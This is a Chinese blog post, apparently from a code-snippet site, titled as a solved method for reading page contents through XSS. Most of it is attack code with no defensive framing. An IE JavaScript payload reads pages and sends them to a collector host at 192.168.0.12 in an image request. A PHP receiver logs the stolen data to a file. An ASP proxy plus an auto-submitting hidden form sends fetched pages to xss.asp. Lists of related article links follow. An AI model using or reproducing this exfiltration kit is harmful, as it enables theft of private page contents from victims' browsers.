xss文件页面内容读取(解决)


Posted in Javascript onNovember 28, 2010

js:

document.body.addBehavior("#default#Download"); 
var mycars = new Array(); 
mycars[0] = "l.htm"; 
mycars[1] = "y.htm"; 
for (x in mycars ) 
{ 
if(document.body.startDownload(mycars[x],GetData)){ 
GetData(source); 
} 
} function GetData(source) 
{ 
txt=escape(source); 
getReaded(txt); 
} 
function getReaded(usr) { 
var newimg = new Image(); 
newimg.src="http://192.168.0.12/style.php?key="+"\n"+"\n"+usr+"\n"+"\n"; 
}

php:

<?php 
header('Content-Type:text/html;charset=GB2312'); 
function unescape($str) { 
$str = rawurldecode($str); 
preg_match_all("/%u.{4}|&#x.{4};|&#\d+;|.+/U",$str,$r); 
$ar = $r[0]; 
foreach($ar as $k=>$v) { 
if(substr($v,0,2) == "%u") 
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,-4))); 
elseif(substr($v,0,3) == "&#x") 
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,3,-1))); 
elseif(substr($v,0,2) == "&#") { 
$ar[$k] = iconv("UCS-2","UTF-8",pack("n",substr($v,2,-1))); 
} 
} 
return join("",$ar); 
} 
$file="news.html"; 
$_GET['key']=unescape($_GET['key']); 
fputs(fopen($file,'a+'),$_GET['key']); 
?>

=================================================以下通用了===============
<% 
Response.Buffer = True 
Dim sUrlB,send(2) 
send(0)=escape(PageWebProxy("http://192.168.0.5/sohu.htm")) 
send(1)=escape(PageWebProxy("http://192.168.0.5/c.htm")) 
function PageWebProxy(xmlpath) 
Dim i, re, Url, Html 
Url = xmlpath Set re = New RegExp 
re.IgnoreCase = True 
re.Global = True 
sUrlB = Url 
Html = getHTTPPage(Url) 
Url = Left(Url, InStrRev(Url, "/")) 
i = InStr(sUrlB, "?") 
If i > 0 Then 
sUrlB = Left(sUrlB, i - 1) 
End If 
re.Pattern = "(href|action)=(\'|"")?(\?)" 
Html = re.Replace(Html,"$1=$2" & sUrlB & "?") 
re.Pattern = "(src|action|href)=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1x=$2$3$2") 
re.Pattern = "(window\.open|url)\((\'|"")?((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1x($2$3$2)") 
re.Pattern = "(src|action|href|background)=(\'|"")?([^\/""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2" & Url & "$3$2") 
re.Pattern = "(src|action|href|background)=(\'|"")?\/([^""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$3$2") 
re.Pattern = "(src|action|href)=(\'|"")?\/(\'|"")?" 
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$2") 
re.Pattern = "(window\.open|url)\((\'|"")?([^\/""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1($2" & Url & "$3$2)") 
re.Pattern = "(window\.open|url)\((\'|"")?\/([^""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1($2http://" & Split(Url, "/")(2) & "/$3$2)") 
Html = Replace(Html, "&", "%26") 
If Split(Url, "/")(2) = "club.isso.com.cn" Then 
Html = Replace(Html, "%26amp;", "%26") 
Else 
Html = Replace(Html, "%26amp;", "&") 
End If 
Html = Replace(Html, "%26nbsp;", " ") 
Html = Replace(Html, "%26lt;", "<") 
Html = Replace(Html, "%26gt;", ">") 
Html = Replace(Html, "%26quot;", """) 
Html = Replace(Html, "%26copy;", "©") 
Html = Replace(Html, "%26reg;", "®") 
Html = Replace(Html, "%26raquo;", "»") 
Html = Replace(Html, "%26%26", "&&") 
Html = Replace(Html, "%26#", "&#") 
' Html = Replace(Html, "%26", "") 
re.Pattern = "(src|action|href)x=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2$3$2") 
re.Pattern = "((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)" '"(gif|jpg|bmp|png))" 
Html = re.Replace(Html,"?url=$1") 
re.Pattern = "\?url=" & Url & "(#|javascript:)" 
Html = re.Replace(Html,"$1") 
re.Pattern = "multipart\/form-data" 
Html = re.Replace(Html,"") 
PageWebProxy=Html 
End function 
Function getHTTPPage(url) 
Dim Http, theStr, fileExt 
Set Http = Server.CreateObject("MSXML2.XMLHTTP") 
If Request.Form.Count > 0 Then 
For Each x In Request.Form 
theStr = theStr & Server.UrlEncode(x) & "=" & Server.UrlEncode(Request.Form(x)) & "&" 
Next 
Http.Open "POST", url, False 
Http.SetRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded" 
Http.Send(theStr) 
Else 
Http.Open "GET", url, False 
Http.Send() 
End If 
If Http.readystate<>4 then Exit Function 
fileExt = LCase(Mid(url, InStrRev(url, ".") + 1)) 
If InStr("$jpg$gif$bmp$png$js$", "$" & fileExt & "$") > 0 Then 
Response.Clear 
Response.BinaryWrite Http.responseBody 
Response.End() 
Else 
If InStr("$rar$mdb$zip$exe$com$ico$", "$" & fileExt & "$") > 0 Then 
Response.AddHeader "Content-Disposition", "Attachment; Filename=" & Mid(sUrlB, InStrRev(sUrlB, "/") + 1) 
Response.BinaryWrite Http.responseBody 
Response.Flush 
Else 
getHTTPPage = bytesToBSTR(Http.responseBody, "GB2312") 
End If 
End If 
Set Http = Nothing 
End Function 
Function BytesToBstr(body,Cset) 
Dim objstream 
Set objstream = Server.CreateObject("adodb.stream") 
objstream.Type = 1 
objstream.Mode =3 
objstream.Open 
objstream.Write body 
objstream.Position = 0 
objstream.Type = 2 
objstream.Charset = Cset 
BytesToBstr = objstream.ReadText 
objstream.Close 
Set objstream = nothing 
End Function 
%> 
document.writeln("<iframe name=\"mimi\" src=about:blank style=display:none><\/iframe>") 
document.writeln("<form id=form action=http:\/\/192.168.0.12\/xss.asp method=POST target=mimi>"); 
document.writeln("<input id=var name=var type=hidden>"); 
document.writeln("<input id=vartwo name=vartwo type=hidden>"); 
document.writeln("<input type=submit style=display:none>"); 
document.writeln("<\/form>") 
document.getElementById("var").value ='http://192.168.0.5/sohu.htm'+unescape('<%=send(0)%>'); 
document.getElementById("vartwo").value ='http://192.168.0.5/c.htm'+unescape('<%=send(1)%>'); 
document.getElementById("form").submit();
Javascript 相关文章推荐
jQuery 1.3 和 Validation 验证插件1.5.1
Jul 09 Javascript
JQuery拖拽元素改变大小尺寸实现代码
Dec 10 Javascript
DIV+CSS+JS不间断横向滚动实现代码
Mar 19 Javascript
jQuery弹出(alert)select选择的值
Apr 21 Javascript
JS对象转换为Jquery对象实现代码
Dec 29 Javascript
jQuery实现简单下拉导航效果
Sep 07 Javascript
javascript实现自动填写表单实例简析
Dec 02 Javascript
ReactNative页面跳转实例代码
Sep 27 Javascript
webpack使用 babel-loader 转换 ES6代码示例
Aug 21 Javascript
微信小程序实现城市列表选择
Jun 05 Javascript
在vue2.0中引用element-ui组件库的方法
Jun 21 Javascript
用js编写留言板
Mar 17 Javascript
用js来解决ajax读取页面乱码
Nov 28 #Javascript
window.name代替cookie的实现代码
Nov 28 #Javascript
在一个js文件里远程调用jquery.js会在ie8下的一个奇怪问题
Nov 28 #Javascript
一个网马的tips实现分析
Nov 28 #Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
You might like
解析PHP处理换行符的问题 \r\n
2013/06/13 PHP
JavaScript 拾碎[三] 使用className属性
2010/10/16 Javascript
图片轮换效果实现代码(点击按钮停止执行)
2013/04/12 Javascript
解读JavaScript中 For, While与递归的用法
2013/05/07 Javascript
js showModalDialog参数的使用详解
2014/01/07 Javascript
jquery实现邮箱自动补全功能示例分享
2014/02/17 Javascript
js获取当前日期时间及其它操作汇总
2015/04/17 Javascript
jQuery插件expander实现图片翻转特效
2015/05/21 Javascript
javascript求日期差的方法
2016/03/02 Javascript
ionic在开发ios系统微信时键盘挡住输入框的解决方法(键盘弹出问题)
2016/09/06 Javascript
jquery实现刷新随机变化样式特效(tag标签样式)
2017/02/03 Javascript
jquery中绑定事件的异同
2017/02/28 Javascript
详解Angular路由之路由守卫
2018/05/10 Javascript
深入浅析Vue中的 computed 和 watch
2018/06/06 Javascript
vue实现点击选中,其他的不选中方法
2018/09/05 Javascript
微信小程序实现横向滚动导航栏效果
2019/12/12 Javascript
JavaScript中的全局属性与方法深入解析
2020/06/14 Javascript
python字符串分割及字符串的一些常规方法
2019/07/24 Python
tensorflow 实现数据类型转换
2020/02/17 Python
Python如何存储数据到json文件
2020/03/09 Python
Python3实现个位数字和十位数字对调, 其乘积不变
2020/05/03 Python
Pycharm快捷键配置详细整理
2020/10/13 Python
Django自带用户认证系统使用方法解析
2020/11/12 Python
Python开发.exe小工具的详细步骤
2021/01/27 Python
CSS3媒体查询(Media Queries)介绍
2013/09/12 HTML / CSS
html5嵌入内容_动力节点Java学院整理
2017/07/07 HTML / CSS
"火柴棍式"程序员面试题
2014/03/16 面试题
架构师岗位职责
2013/11/18 职场文书
小学生美德少年事迹材料
2014/08/24 职场文书
python绘制箱型图
2021/04/27 Python
tensorflow+k-means聚类简单实现猫狗图像分类的方法
2021/04/28 Python
Flask搭建一个API服务器的步骤
2021/05/28 Python
PHP获取学生成绩的方法
2021/11/17 PHP
vue实现移动端div拖动效果
2022/03/03 Vue.js
WINDOWS下安装mysql 8.x 的方法图文教程
2022/04/19 MySQL
阿里云服务器Ubuntu 20.04上安装Odoo 15
2022/05/20 Servers